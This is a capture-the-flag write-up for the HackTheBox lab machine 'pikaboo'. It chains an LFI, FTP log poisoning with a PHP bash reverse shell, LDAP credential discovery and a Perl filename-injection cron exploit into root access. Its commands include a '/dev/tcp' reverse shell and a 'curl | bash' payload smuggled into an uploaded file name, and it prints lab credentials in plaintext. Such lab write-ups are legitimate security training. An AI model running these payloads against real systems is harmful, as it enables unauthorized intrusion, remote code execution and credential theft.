pikaboo
The admin link
Even if we try anything after admin like 'adminqwer' it still requires authentication.
Pressing the cancel button ->
According to the nmap scan the website is nginx and the error redirects us to apache also that on port 81 some kind of proxy
Because even when going to /adminasdf it gives us a login prompt means there is a misconfiguration.
Same seems to be a case here there is no trailing slash after admin.
I ll try to access common apache files like server-status.
There is request to admin_staging which looks interesting.
There is a lfi.
I ll write a script ->
import requests
import re
import base64
while True:
i = input('> ')
url = f'http://10.10.10.249/admin../admin_staging/index.php?page=php://filter/convert.base64-encode/resource={i}'
r = requests.get(url)
pattern = re.compile(r'nel">\n(.*?)</div>')
match = pattern.finditer(r.text)
#print(r.text)
for matches in match:
extracted_base64 = matches.group(1)
decoded_bytes = base64.b64decode(extracted_base64)
decoded_string = decoded_bytes.decode('utf-8')
print(decoded_string)
I was not able to view any files in /etc/ like /etc/passwd so I used a wordlist.
Gobuster for lfi interesting files.->
➜ script wfuzz -u http://10.10.10.249/admin../admin_staging/index.php\?page\=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.249/admin../admin_staging/index.php?page=FUZZ
Total requests: 880
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000216: 200 413 L 1670 W 19803 Ch "/var/log/vsftpd.log"
000000217: 200 557 L 1381 W 169663 Ch "/var/log/wtmp"
Total time: 0
Processed Requests: 880
Filtered Requests: 878
Requests/sec.: 0
Before reading the log file -> index.php file
The php file uses include to add a file
Which is a dangerous function as the function can help an attacker to execute php code if he/she can control the files on the server. Like In our case we can read vsftpd.log and also create a log as when we enter a wrong credential it gets in the ftp.log file and because the server uses include statement the attacker will be able to execute a code if inserted in ftp username.
I ll enter a php reverse shell in username
➜ script ftp 10.10.10.249
Connected to 10.10.10.249.
220 (vsFTPd 3.0.3)
Name (10.10.10.249:nakul): <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/9001 0>&1'");?>
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
Now I ll reload the page
The page hangs and we get a reverse shell
www-data@pikaboo:/var/www/html/admin_staging$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 550/nginx: worker p
tcp 0 0 127.0.0.1:81 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:389 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 550/nginx: worker p
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Ldap is open but I dont have creds,
Enumerating the server I found credentials in /opt/pokeapi/config/settings.py
LDAP creds->
ldapsearch -h 127.0.0.1 -x -s base namingcontexts -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: dc=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
ldapsearch -h 127.0.0.1 -x -b 'dc=htb' -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'
echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_
The credentials were not of ssh, but rather they were of ftp
➜ Pikaboo ftp 10.10.10.249
Connected to 10.10.10.249.
220 (vsFTPd 3.0.3)
Name (10.10.10.249:nakul): pwnmeow
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
I tried to find these folders in the server using www shell
www-data@pikaboo:/opt/pokeapi/config$ find / -type d 2>/dev/null | grep abilities
/sys/devices/platform/i8042/serio0/input/input0/capabilities
/sys/devices/platform/i8042/serio1/input/input3/capabilities
/sys/devices/platform/i8042/serio1/input/input2/capabilities
/sys/devices/platform/pcspkr/input/input5/capabilities
/sys/devices/system/cpu/vulnerabilities
/sys/devices/LNXSYSTM:00/LNXPWRBN:00/input/input4/capabilities
/srv/ftp/conquest_pokemon_abilities
/srv/ftp/abilities
/srv/ftp/pokemon_abilities
The ftp folders were connected to /srv/ftp folder.
I tried to put something in the / dir it did not work, but I am able to upload files in any other directory.
Linpeas told there is a cron running every minute
cat /etc/crontab
www-data@pikaboo:/opt/pokeapi/config$ cat /usr/local/bin/csvupdate_cron
#!/bin/bash
for d in /srv/ftp/*
do
cd $d
/usr/local/bin/csvupdate $(basename $d) *csv
/usr/bin/rm -rf *
done
It is calling /usr/bin/csvupdate, which is a perl script.
csvupdate.pl ->
The code is vulnerable to code execution the for(<>) part, This video explains the vulnerability -> https://youtu.be/iczIO8032VU?si=bLy2gsBE7YOZnleR
If I can inject a pipe | The code will execute anything I want.
I can control the parameter as i can upload files in any directory in /opt and running csvupdate on files that end with .csv I ll put a file use pipe to execute my command
#!/bin/bash
for d in /srv/ftp/*
do
cd $d
/usr/local/bin/csvupdate $(basename $d) *csv
/usr/bin/rm -rf *
done
put hello.txt "|ping -c 1 10.10.14.6; asdf.csv"
I got a ping request in a minute.
Now I need a shell.
put hello.txt "|curl 10.10.14.16|bash;asdf.csv"
Got a root shell in a minute.
Root.